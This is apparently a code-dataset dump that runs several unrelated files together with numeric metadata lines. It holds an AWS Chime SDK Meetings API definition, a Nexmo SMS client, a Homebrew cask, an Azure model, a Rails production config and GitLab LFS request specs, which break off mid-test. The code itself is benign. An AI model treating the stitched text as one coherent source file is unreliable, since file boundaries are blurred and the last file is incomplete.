MediaPlacement.add_member(:screen_data_url, Shapes::ShapeRef.new(shape: String, location_name: "ScreenDataUrl"))
MediaPlacement.add_member(:screen_viewing_url, Shapes::ShapeRef.new(shape: String, location_name: "ScreenViewingUrl"))
MediaPlacement.add_member(:screen_sharing_url, Shapes::ShapeRef.new(shape: String, location_name: "ScreenSharingUrl"))
MediaPlacement.add_member(:event_ingestion_url, Shapes::ShapeRef.new(shape: String, location_name: "EventIngestionUrl"))
MediaPlacement.struct_class = Types::MediaPlacement
Meeting.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, location_name: "MeetingId"))
Meeting.add_member(:meeting_host_id, Shapes::ShapeRef.new(shape: ExternalUserId, location_name: "MeetingHostId"))
Meeting.add_member(:external_meeting_id, Shapes::ShapeRef.new(shape: ExternalMeetingId, location_name: "ExternalMeetingId"))
Meeting.add_member(:media_region, Shapes::ShapeRef.new(shape: MediaRegion, location_name: "MediaRegion"))
Meeting.add_member(:media_placement, Shapes::ShapeRef.new(shape: MediaPlacement, location_name: "MediaPlacement"))
Meeting.add_member(:meeting_features, Shapes::ShapeRef.new(shape: MeetingFeaturesConfiguration, location_name: "MeetingFeatures"))
Meeting.struct_class = Types::Meeting
MeetingFeaturesConfiguration.add_member(:audio, Shapes::ShapeRef.new(shape: AudioFeatures, location_name: "Audio"))
MeetingFeaturesConfiguration.struct_class = Types::MeetingFeaturesConfiguration
NotFoundException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
NotFoundException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
NotFoundException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
NotFoundException.struct_class = Types::NotFoundException
NotificationsConfiguration.add_member(:lambda_function_arn, Shapes::ShapeRef.new(shape: Arn, location_name: "LambdaFunctionArn"))
NotificationsConfiguration.add_member(:sns_topic_arn, Shapes::ShapeRef.new(shape: Arn, location_name: "SnsTopicArn"))
NotificationsConfiguration.add_member(:sqs_queue_arn, Shapes::ShapeRef.new(shape: Arn, location_name: "SqsQueueArn"))
NotificationsConfiguration.struct_class = Types::NotificationsConfiguration
ServiceUnavailableException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
ServiceUnavailableException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
ServiceUnavailableException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
ServiceUnavailableException.add_member(:retry_after_seconds, Shapes::ShapeRef.new(shape: RetryAfterSeconds, location: "header", location_name: "Retry-After"))
ServiceUnavailableException.struct_class = Types::ServiceUnavailableException
StartMeetingTranscriptionRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
StartMeetingTranscriptionRequest.add_member(:transcription_configuration, Shapes::ShapeRef.new(shape: TranscriptionConfiguration, required: true, location_name: "TranscriptionConfiguration"))
StartMeetingTranscriptionRequest.struct_class = Types::StartMeetingTranscriptionRequest
StopMeetingTranscriptionRequest.add_member(:meeting_id, Shapes::ShapeRef.new(shape: GuidString, required: true, location: "uri", location_name: "MeetingId"))
StopMeetingTranscriptionRequest.struct_class = Types::StopMeetingTranscriptionRequest
TranscriptionConfiguration.add_member(:engine_transcribe_settings, Shapes::ShapeRef.new(shape: EngineTranscribeSettings, location_name: "EngineTranscribeSettings"))
TranscriptionConfiguration.add_member(:engine_transcribe_medical_settings, Shapes::ShapeRef.new(shape: EngineTranscribeMedicalSettings, location_name: "EngineTranscribeMedicalSettings"))
TranscriptionConfiguration.struct_class = Types::TranscriptionConfiguration
UnauthorizedException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
UnauthorizedException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
UnauthorizedException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
UnauthorizedException.struct_class = Types::UnauthorizedException
UnprocessableEntityException.add_member(:code, Shapes::ShapeRef.new(shape: String, location_name: "Code"))
UnprocessableEntityException.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "Message"))
UnprocessableEntityException.add_member(:request_id, Shapes::ShapeRef.new(shape: String, location_name: "RequestId"))
UnprocessableEntityException.struct_class = Types::UnprocessableEntityException
# @api private
API = Seahorse::Model::Api.new.tap do |api|
api.version = "2021-07-15"
api.metadata = {
"apiVersion" => "2021-07-15",
"endpointPrefix" => "meetings-chime",
"protocol" => "rest-json",
"serviceFullName" => "Amazon Chime SDK Meetings",
"serviceId" => "Chime SDK Meetings",
"signatureVersion" => "v4",
"signingName" => "chime",
"uid" => "chime-sdk-meetings-2021-07-15",
}
api.add_operation(:batch_create_attendee, Seahorse::Model::Operation.new.tap do |o|
o.name = "BatchCreateAttendee"
o.http_method = "POST"
o.http_request_uri = "/meetings/{MeetingId}/attendees?operation=batch-create"
o.input = Shapes::ShapeRef.new(shape: BatchCreateAttendeeRequest)
o.output = Shapes::ShapeRef.new(shape: BatchCreateAttendeeResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o.errors << Shapes::ShapeRef.new(shape: LimitExceededException)
end)
api.add_operation(:create_attendee, Seahorse::Model::Operation.new.tap do |o|
o.name = "CreateAttendee"
o.http_method = "POST"
o.http_request_uri = "/meetings/{MeetingId}/attendees"
o.input = Shapes::ShapeRef.new(shape: CreateAttendeeRequest)
o.output = Shapes::ShapeRef.new(shape: CreateAttendeeResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: UnprocessableEntityException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: LimitExceededException)
end)
api.add_operation(:create_meeting, Seahorse::Model::Operation.new.tap do |o|
o.name = "CreateMeeting"
o.http_method = "POST"
o.http_request_uri = "/meetings"
o.input = Shapes::ShapeRef.new(shape: CreateMeetingRequest)
o.output = Shapes::ShapeRef.new(shape: CreateMeetingResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: LimitExceededException)
end)
api.add_operation(:create_meeting_with_attendees, Seahorse::Model::Operation.new.tap do |o|
o.name = "CreateMeetingWithAttendees"
o.http_method = "POST"
o.http_request_uri = "/meetings?operation=create-attendees"
o.input = Shapes::ShapeRef.new(shape: CreateMeetingWithAttendeesRequest)
o.output = Shapes::ShapeRef.new(shape: CreateMeetingWithAttendeesResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: LimitExceededException)
end)
api.add_operation(:delete_attendee, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeleteAttendee"
o.http_method = "DELETE"
o.http_request_uri = "/meetings/{MeetingId}/attendees/{AttendeeId}"
o.input = Shapes::ShapeRef.new(shape: DeleteAttendeeRequest)
o.output = Shapes::ShapeRef.new(shape: Shapes::StructureShape.new(struct_class: Aws::EmptyStructure))
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
end)
api.add_operation(:delete_meeting, Seahorse::Model::Operation.new.tap do |o|
o.name = "DeleteMeeting"
o.http_method = "DELETE"
o.http_request_uri = "/meetings/{MeetingId}"
o.input = Shapes::ShapeRef.new(shape: DeleteMeetingRequest)
o.output = Shapes::ShapeRef.new(shape: Shapes::StructureShape.new(struct_class: Aws::EmptyStructure))
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
end)
api.add_operation(:get_attendee, Seahorse::Model::Operation.new.tap do |o|
o.name = "GetAttendee"
o.http_method = "GET"
o.http_request_uri = "/meetings/{MeetingId}/attendees/{AttendeeId}"
o.input = Shapes::ShapeRef.new(shape: GetAttendeeRequest)
o.output = Shapes::ShapeRef.new(shape: GetAttendeeResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
end)
api.add_operation(:get_meeting, Seahorse::Model::Operation.new.tap do |o|
o.name = "GetMeeting"
o.http_method = "GET"
o.http_request_uri = "/meetings/{MeetingId}"
o.input = Shapes::ShapeRef.new(shape: GetMeetingRequest)
o.output = Shapes::ShapeRef.new(shape: GetMeetingResponse)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
end)
api.add_operation(:list_attendees, Seahorse::Model::Operation.new.tap do |o|
o.name = "ListAttendees"
o.http_method = "GET"
o.http_request_uri = "/meetings/{MeetingId}/attendees"
o.input = Shapes::ShapeRef.new(shape: ListAttendeesRequest)
o.output = Shapes::ShapeRef.new(shape: ListAttendeesResponse)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o[:pager] = Aws::Pager.new(
limit_key: "max_results",
tokens: {
"next_token" => "next_token"
}
)
end)
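      # Because of the pager above, the generated client can auto-paginate
      # ListAttendees responses. A rough usage sketch (meeting id is illustrative):
      #   client = Aws::ChimeSDKMeetings::Client.new
      #   client.list_attendees(meeting_id: 'meeting-id').each do |page|
      #     page.attendees.each { |attendee| puts attendee.attendee_id }
      #   end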
api.add_operation(:start_meeting_transcription, Seahorse::Model::Operation.new.tap do |o|
o.name = "StartMeetingTranscription"
o.http_method = "POST"
o.http_request_uri = "/meetings/{MeetingId}/transcription?operation=start"
o.input = Shapes::ShapeRef.new(shape: StartMeetingTranscriptionRequest)
o.output = Shapes::ShapeRef.new(shape: Shapes::StructureShape.new(struct_class: Aws::EmptyStructure))
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: LimitExceededException)
o.errors << Shapes::ShapeRef.new(shape: UnprocessableEntityException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
end)
api.add_operation(:stop_meeting_transcription, Seahorse::Model::Operation.new.tap do |o|
o.name = "StopMeetingTranscription"
o.http_method = "POST"
o.http_request_uri = "/meetings/{MeetingId}/transcription?operation=stop"
o.input = Shapes::ShapeRef.new(shape: StopMeetingTranscriptionRequest)
o.output = Shapes::ShapeRef.new(shape: Shapes::StructureShape.new(struct_class: Aws::EmptyStructure))
o.errors << Shapes::ShapeRef.new(shape: ForbiddenException)
o.errors << Shapes::ShapeRef.new(shape: NotFoundException)
o.errors << Shapes::ShapeRef.new(shape: BadRequestException)
o.errors << Shapes::ShapeRef.new(shape: UnauthorizedException)
o.errors << Shapes::ShapeRef.new(shape: UnprocessableEntityException)
o.errors << Shapes::ShapeRef.new(shape: ServiceUnavailableException)
end)
end
end
end
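# Usage sketch (not part of the generated file): the operation definitions above
# are consumed through the generated SDK client. Assuming this is the Chime SDK
# meetings API (the client class name here is an assumption), a paginated
# ListAttendees call would look roughly like:
#
#   client = Aws::ChimeSDKMeetings::Client.new(region: "us-east-1")
#   client.list_attendees(meeting_id: "meeting-id", max_results: 10).each_page do |page|
#     page.attendees.each { |attendee| puts attendee.attendee_id }
#   end
#
# The `o[:pager]` metadata above is what lets `each_page` follow `next_token`.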
| 73.990698 | 211 | 0.775302 |
b93aad7764fc78a8da8d7450c68772588353fde5 | 3,543 | # encoding: UTF-8
# Copyright © 2012, 2013, 2014, 2015, Carousel Apps
require "bigdecimal"
require "net/http"
require "net/https"
require "json"
require "uri"
# Nexmo response
class ActionTexter::NexmoResponse < ActionTexter::Response
SUCCESS_RESPONSE_CODE = "0"
# TODO: Some of these should be moved to Response if they are common enough.
attr_reader :original, :parts_count, :parts, :cost, :remaining_balance, :reference
private
def process_response(raw)
@success = true
@original = JSON.parse(raw)
@parts_count = @original["message-count"].to_i
    @cost = BigDecimal("0")
@reference = @original["messages"].first["client-ref"] # They should all be the same, we only record it the first time.
@remaining_balance = @original["messages"].last["remaining-balance"] # I hope the last one is the lowest one, the cost of a single message shouldn't make that big of a difference anyway.
@parts = []
error_messages = []
@original["messages"].each do |raw_part|
      if @success # Update @success with this part's status unless a previous part has already failed.
@success = raw_part["status"] == SUCCESS_RESPONSE_CODE
end
part = {:id => raw_part["message-id"],
:to => raw_part["to"],
:success => raw_part["status"] == SUCCESS_RESPONSE_CODE}
part[:reference] = raw_part["client-ref"] if raw_part.has_key? "client-ref"
if raw_part.has_key? "message-price"
part[:cost] = raw_part["message-price"]
        @cost += BigDecimal(raw_part["message-price"])
end
if raw_part.has_key? "remaining-balance"
        part[:remaining_balance] = BigDecimal(raw_part["remaining-balance"])
end
if raw_part.has_key? "error-text"
part[:error_message] = raw_part["error-text"]
error_messages << part[:error_message]
end
@parts << part
end
if error_messages.any?
@error_message = error_messages.uniq.join(", ")
end
end
end
# Implementation of client for Nexmo: http://nexmo.com
class ActionTexter::NexmoClient < ActionTexter::Client
attr_accessor :key, :secret
# Create a new Nexmo client with key and secret.
#
# @param [String] key key as specified by Nexmo for authenticating.
# @param [String] secret secret as specified by Nexmo for authenticating.
def initialize(key, secret)
super()
self.key = key
self.secret = secret
end
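  # Usage sketch (illustrative; assumes a message object responding to #from,
  # #to, #text and #reference, which is exactly what #deliver reads below):
  #
  #   client = ActionTexter::NexmoClient.new("api-key", "api-secret")
  #   response = client.deliver(message)
  #   response.parts_count # => number of SMS parts Nexmo split the text into
  #   response.cost        # => total cost across all parts (BigDecimal)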
def deliver(message)
client = Net::HTTP.new("rest.nexmo.com", 443)
client.use_ssl = true
# Nexmo doesn't like phone numbers starting with a +
# Pattern only matches phones that are pristine phone numbers starting with a +, and leaves everything else alone
pattern = /^\+(\d+)$/
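    # e.g. "+447700900123" becomes "447700900123"; "00447700900123" is left unchanged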
from = (message.from =~ pattern ? message.from.gsub(pattern, '\1') : message.from )
to = (message.to =~ pattern ? message.to.gsub(pattern, '\1') : message.to )
response = client.post(
"/sms/json",
URI.encode_www_form("username" => @key,
"password" => @secret,
"from" => from,
"to" => to,
"text" => message.text,
"type" => (message.text.ascii_only? ? "text" : "unicode"),
"client-ref" => message.reference),
{"Content-Type" => "application/x-www-form-urlencoded"})
return ActionTexter::NexmoResponse.new(response.body)
end
# @private
def to_s
"#<#{self.class.name}:#{key}>"
end
end
| 36.153061 | 190 | 0.631668 |
f7e6c4f95e7e33b8da993bf5905d42e4f79103f2 | 1,555 | cask "visual-studio-code-insiders" do
version "1.58.0,a81fff00c9dab105800118fcf8b044cd84620419"
if Hardware::CPU.intel?
sha256 "5f68ea465959f9c157e11493c5812c4b566424819313e841381360a0a53b30f9"
url "https://az764295.vo.msecnd.net/insider/#{version.after_comma}/VSCode-darwin.zip",
verified: "az764295.vo.msecnd.net/insider/"
else
sha256 "3d00cfa729ee6366f28cd8cf5e698147c8d80509128d60da854388ad02ff87a1"
url "https://az764295.vo.msecnd.net/insider/#{version.after_comma}/VSCode-darwin-arm64.zip",
verified: "az764295.vo.msecnd.net/insider/"
end
name "Microsoft Visual Studio Code"
name "Visual Studio Code Insiders"
desc "Code editor"
homepage "https://code.visualstudio.com/insiders"
livecheck do
url "https://update.code.visualstudio.com/api/update/darwin-universal/insider/VERSION"
strategy :page_match do |page|
name = page[/"name":"(\d+(?:\.\d+)*)/i, 1]
version = page[/"version":"(\w+)/i, 1]
"#{name},#{version}"
end
end
auto_updates true
app "Visual Studio Code - Insiders.app"
binary "#{appdir}/Visual Studio Code - Insiders.app/Contents/Resources/app/bin/code", target: "code-insiders"
zap trash: [
"~/Library/Application Support/Code - Insiders",
"~/Library/Caches/Code - Insiders",
"~/Library/Caches/com.microsoft.VSCodeInsiders",
"~/Library/Caches/com.microsoft.VSCodeInsiders.ShipIt",
"~/Library/Preferences/com.microsoft.VSCodeInsiders.helper.plist",
"~/Library/Preferences/com.microsoft.VSCodeInsiders.plist",
]
end
| 35.340909 | 111 | 0.717042 |
61629e5680b168b7af6aed547443c588fe2f1e73 | 1,648 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Compute::Mgmt::V2019_12_01
module Models
#
# The properties describe the recommended machine configuration for this
# Image Definition. These properties are updatable.
#
class RecommendedMachineConfiguration
include MsRestAzure
# @return [ResourceRange]
attr_accessor :v_cpus
# @return [ResourceRange]
attr_accessor :memory
#
# Mapper for RecommendedMachineConfiguration class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'RecommendedMachineConfiguration',
type: {
name: 'Composite',
class_name: 'RecommendedMachineConfiguration',
model_properties: {
v_cpus: {
client_side_validation: true,
required: false,
serialized_name: 'vCPUs',
type: {
name: 'Composite',
class_name: 'ResourceRange'
}
},
memory: {
client_side_validation: true,
required: false,
serialized_name: 'memory',
type: {
name: 'Composite',
class_name: 'ResourceRange'
}
}
}
}
}
end
end
end
end
| 27.016393 | 76 | 0.54551 |
33b0e7f0dabdcd298ee8926b1a344940b3953ec5 | 256 | module Kata
module Kyu7
class << self
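      # Each year the population grows by floor(p0 * percent / 100 + aug); the
      # method returns the number of whole years needed to reach or exceed p.
      # Worked example (computed by hand from the loop below):
      #   Kata::Kyu7.growth_of_a_population(1500, 5, 100, 5000) #=> 15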
def growth_of_a_population(p0, percent, aug, p)
loop.with_index(1) do |_, years|
return years unless (p0 += (p0 * percent/100.0 + aug).floor) < p
end
end
end
end
end
| 18.285714 | 74 | 0.570313 |
e950dbc6233b0de93f3fd8f71607f3cdf06d22de | 5,452 | # frozen_string_literal: true
require 'active_support/core_ext/integer/time'
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress CSS using a preprocessor.
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Include generic and useful information about system operation, but avoid logging too much
# information to avoid inadvertent exposure of personally identifiable information (PII).
config.log_level = :info
# Prepend all log lines with the following tags.
config.log_tags = [:request_id]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "Private_events_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Log disallowed deprecations.
config.active_support.disallowed_deprecation = :log
# Tell Active Support which deprecation messages to disallow.
config.active_support.disallowed_deprecation_warnings = []
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require "syslog/logger"
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV['RAILS_LOG_TO_STDOUT'].present?
logger = ActiveSupport::Logger.new($stdout)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Inserts middleware to perform automatic connection switching.
# The `database_selector` hash is used to pass options to the DatabaseSelector
# middleware. The `delay` is used to determine how long to wait after a write
# to send a subsequent read to the primary.
#
# The `database_resolver` class is used by the middleware to determine which
# database is appropriate to use based on the time delay.
#
# The `database_resolver_context` class is used by the middleware to set
# timestamps for the last write to the primary. The resolver uses the context
# class timestamps to determine how long to wait before reading from the
# replica.
#
# By default Rails will store a last write timestamp in the session. The
# DatabaseSelector middleware is designed as such you can define your own
# strategy for connection switching and pass that into the middleware through
# these configuration options.
# config.active_record.database_selector = { delay: 2.seconds }
# config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
# config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
# config.action_mailer.default_url_options = { host: 'localhost', port: 3000 }
end
| 43.967742 | 114 | 0.765407 |
f80abb06fca31b828fc80dafd03d1f7477fc413d | 45,827 | require 'spec_helper'
describe 'Git LFS API and storage' do
include WorkhorseHelpers
include ProjectForksHelper
let(:user) { create(:user) }
let!(:lfs_object) { create(:lfs_object, :with_file) }
let(:headers) do
{
'Authorization' => authorization,
'X-Sendfile-Type' => sendfile
}.compact
end
let(:authorization) { }
let(:sendfile) { }
let(:pipeline) { create(:ci_empty_pipeline, project: project) }
let(:sample_oid) { lfs_object.oid }
let(:sample_size) { lfs_object.size }
describe 'when lfs is disabled' do
let(:project) { create(:project) }
let(:body) do
{
'objects' => [
{ 'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078 },
{ 'oid' => sample_oid,
'size' => sample_size }
],
'operation' => 'upload'
}
end
let(:authorization) { authorize_user }
before do
allow(Gitlab.config.lfs).to receive(:enabled).and_return(false)
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
end
it 'responds with 501' do
expect(response).to have_gitlab_http_status(501)
expect(json_response).to include('message' => 'Git LFS is not enabled on this GitLab server, contact your admin.')
end
end
context 'project specific LFS settings' do
let(:project) { create(:project) }
let(:body) do
{
'objects' => [
{ 'oid' => '91eff75a492a3ed0dfcb544d7f31326bc4014c8551849c192fd1e48d4dd2c897',
'size' => 1575078 },
{ 'oid' => sample_oid,
'size' => sample_size }
],
'operation' => 'upload'
}
end
let(:authorization) { authorize_user }
context 'with LFS disabled globally' do
before do
project.add_master(user)
allow(Gitlab.config.lfs).to receive(:enabled).and_return(false)
end
describe 'LFS disabled in project' do
before do
project.update_attribute(:lfs_enabled, false)
end
it 'responds with a 501 message on upload' do
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
expect(response).to have_gitlab_http_status(501)
end
it 'responds with a 501 message on download' do
get "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}", nil, headers
expect(response).to have_gitlab_http_status(501)
end
end
describe 'LFS enabled in project' do
before do
project.update_attribute(:lfs_enabled, true)
end
it 'responds with a 501 message on upload' do
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
expect(response).to have_gitlab_http_status(501)
end
it 'responds with a 501 message on download' do
get "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}", nil, headers
expect(response).to have_gitlab_http_status(501)
end
end
end
context 'with LFS enabled globally' do
before do
project.add_master(user)
enable_lfs
end
describe 'LFS disabled in project' do
before do
project.update_attribute(:lfs_enabled, false)
end
it 'responds with a 403 message on upload' do
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
expect(response).to have_gitlab_http_status(403)
expect(json_response).to include('message' => 'Access forbidden. Check your access level.')
end
it 'responds with a 403 message on download' do
get "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}", nil, headers
expect(response).to have_gitlab_http_status(403)
expect(json_response).to include('message' => 'Access forbidden. Check your access level.')
end
end
describe 'LFS enabled in project' do
before do
project.update_attribute(:lfs_enabled, true)
end
it 'responds with a 200 message on upload' do
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects/batch", body, headers
expect(response).to have_gitlab_http_status(200)
expect(json_response['objects'].first['size']).to eq(1575078)
end
it 'responds with a 200 message on download' do
get "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}", nil, headers
expect(response).to have_gitlab_http_status(200)
end
end
end
end
describe 'deprecated API' do
let(:project) { create(:project) }
before do
enable_lfs
end
    shared_examples 'a deprecated endpoint' do
it 'responds with 501' do
expect(response).to have_gitlab_http_status(501)
end
it 'returns deprecated message' do
expect(json_response).to include('message' => 'Server supports batch API only, please update your Git LFS client to version 1.0.1 and up.')
end
end
context 'when fetching lfs object using deprecated API' do
let(:authorization) { authorize_user }
before do
get "#{project.http_url_to_repo}/info/lfs/objects/#{sample_oid}", nil, headers
end
      it_behaves_like 'a deprecated endpoint'
end
context 'when handling lfs request using deprecated API' do
let(:authorization) { authorize_user }
before do
post_lfs_json "#{project.http_url_to_repo}/info/lfs/objects", nil, headers
end
      it_behaves_like 'a deprecated endpoint'
end
end
describe 'when fetching lfs object' do
let(:project) { create(:project) }
let(:update_permissions) { }
let(:before_get) { }
before do
enable_lfs
update_permissions
before_get
get "#{project.http_url_to_repo}/gitlab-lfs/objects/#{sample_oid}", nil, headers
end
context 'and request comes from gitlab-workhorse' do
context 'without user being authorized' do
it 'responds with status 401' do
expect(response).to have_gitlab_http_status(401)
end
end
context 'with required headers' do
shared_examples 'responds with a file' do
let(:sendfile) { 'X-Sendfile' }
it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'responds with the file location' do
expect(response.headers['Content-Type']).to eq('application/octet-stream')
expect(response.headers['X-Sendfile']).to eq(lfs_object.file.path)
end
end
        context 'when the user is authorized' do
let(:authorization) { authorize_user }
context 'and does not have project access' do
let(:update_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 404' do
expect(response).to have_gitlab_http_status(404)
end
end
context 'and does have project access' do
let(:update_permissions) do
project.add_master(user)
project.lfs_objects << lfs_object
end
it_behaves_like 'responds with a file'
context 'when LFS uses object storage' do
context 'when proxy download is enabled' do
let(:before_get) do
stub_lfs_object_storage(proxy_download: true)
lfs_object.file.migrate!(LfsObjectUploader::Store::REMOTE)
end
            it 'responds with status 200' do
expect(response).to have_gitlab_http_status(200)
end
it 'responds with the workhorse send-url' do
expect(response.headers[Gitlab::Workhorse::SEND_DATA_HEADER]).to start_with("send-url:")
end
end
context 'when proxy download is disabled' do
let(:before_get) do
stub_lfs_object_storage(proxy_download: false)
lfs_object.file.migrate!(LfsObjectUploader::Store::REMOTE)
end
it 'responds with redirect' do
expect(response).to have_gitlab_http_status(302)
end
it 'responds with the file location' do
expect(response.location).to include(lfs_object.reload.file.path)
end
end
end
end
end
context 'when deploy key is authorized' do
let(:key) { create(:deploy_key) }
let(:authorization) { authorize_deploy_key }
let(:update_permissions) do
project.deploy_keys << key
project.lfs_objects << lfs_object
end
it_behaves_like 'responds with a file'
end
describe 'when using a user key' do
let(:authorization) { authorize_user_key }
context 'when user allowed' do
let(:update_permissions) do
project.add_master(user)
project.lfs_objects << lfs_object
end
it_behaves_like 'responds with a file'
end
context 'when user not allowed' do
let(:update_permissions) do
project.lfs_objects << lfs_object
end
it 'responds with status 404' do
expect(response).to have_gitlab_http_status(404)
end
end
end
context 'when build is authorized as' do
let(:authorization) { authorize_ci_project }
shared_examples 'can download LFS only from own projects' do
context 'for owned project' do
let(:project) { create(:project, namespace: user.namespace) }
let(:update_permissions) do
project.lfs_objects << lfs_object
end
it_behaves_like 'responds with a file'
end
context 'for member of project' do
let(:pipeline) { create(:ci_empty_pipeline, project: project) }
let(:update_permissions) do
project.add_reporter(user)
project.lfs_objects << lfs_object
end
it_behaves_like 'responds with a file'
end
context 'for other project' do
let(:other_project) { create(:project) }
let(:pipeline) { create(:ci_empty_pipeline, project: other_project) }
let(:update_permissions) do
project.lfs_objects << lfs_object
end
it 'rejects downloading code' do
expect(response).to have_gitlab_http_status(other_project_status)
end
end
end
context 'administrator' do
let(:user) { create(:admin) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
it_behaves_like 'can download LFS only from own projects' do
        # We render 403 because an administrator normally does have access
let(:other_project_status) { 403 }
end
end
context 'regular user' do
let(:user) { create(:user) }
let(:build) { create(:ci_build, :running, pipeline: pipeline, user: user) }
